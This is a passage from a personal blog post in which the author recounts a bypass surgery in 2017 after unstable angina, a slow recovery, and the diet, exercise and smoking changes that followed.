Over the next few days those same pains would come back.  I couldn’t associate them with any specific activity or food that I ate; they would just appear and literally put me on the floor a couple of times.  I refused to go back to the hospital for them to keep me overnight and eventually tell me that nothing was wrong, but agreed to my wife’s pleading that I call the cardiologist.  My cardiologist scheduled me for a heart catheterization, which I had a few days later.  The results of that test were a little more bleak, in that they had identified multiple blockages with no option for stents.  The pain was attributed to unstable angina and I needed to have bypass surgery.  When I asked why the stress test didn’t find anything I was told that the test tries to identify anomalous blood flow in different portions of the heart.  All of the blood flow in my heart was abnormal, so it looked normal on the test.  Anomaly detection failed to find what it should have… that’s just crazy!!!

The following morning I was taken in for surgery, which lasted several hours.  I remember saying goodbye to my wife and being wheeled into the operating room.  The next thing I remember was waking up the following day on a breathing machine (not a good feeling) with other tubes and wires going in and out of my chest and abdomen.  I eventually spent the next week in the hospital.  The first night that I was conscious I was scared to fall asleep because I didn’t think I was going to wake up.  I wound up staying awake that entire night.  Watching the machines that I was connected to.  Watching the nurses walk by.  Listening to the sounds of a hospital.  It was a long night and I thought a lot about my family.  I thought about how, given the chance, things would be different and vowed to make some changes in my life. 

Over the next few days I was able to become a little more active and even more so every day that went by.  When I was released from the hospital I was able to stand up from a chair and walk a few hundred feet on my own.  After I returned home, every day I kept pushing myself physically.  I would have my wife take me to the local shopping mall so I could walk.  I was a mall walker and probably the slowest one at that, but that was ok.  At least I was able to get out and start to take control of the things that I was able to.  Other things that I needed to take control of were the main contributors to my situation: smoking, diet and weight.

I felt that if I continued to exercise I would only have to start eating better to get my weight under control.  Better diet to me meant cutting out sodium as much as possible and limiting saturated fat intake.  This was all a good start and definitely something that I needed to do, but I wasn’t losing the weight that I thought I should be.  I then began to count calories and really focus on portion control.  This is when the weight really started to come off, but it also had me feeling hungry all of the time.  I guess nobody ever said that it was going to be easy and I actually thought that quitting smoking was easier than changing and limiting my diet.  But as the pounds started to come off, my motivation to keep going grew stronger.  In the long run it was well worth the effort.

Healing seemed slow and very painful.  I needed help trying to sit up after laying down or trying to pick up anything with more than a few pounds of weight.  I knew that it would take time and that I would eventually get over it, but that feeling of being helpless was very frustrating.  There were also side effects of being on the heart-lung machine that I don’t think I will ever recover from.  One being my eyesight, which has dramatically changed, another being my ability to concentrate over longer periods of time, and another being forgetfulness, but that’s ok because it’s much better than the alternative. 

It's been several months now since my surgery.  I’ve lost all of the weight that I needed to or feel like I should have.  I continue eating healthy, which has the side effect of my family eating much healthier.  I spend an hour on cardio as well as lift weights 6 days a week.  I feel so much better than I have in a very very long time.  This journey has taught me so much about myself and the things that are truly important.  For me these things are:
  1. Myself
  2. My health
  3. My family
  4. My friends

I’ve also learned that it’s never too late to take control of those things that are holding you back or adversely affecting your life.  A little focus, persistence and patience can go a long way when you are trying to reach a goal!  


2017 is a year that I am glad is over. I do look forward to 2018 and the things that this year will bring (I just hope they are non life changing 😃)
Before

After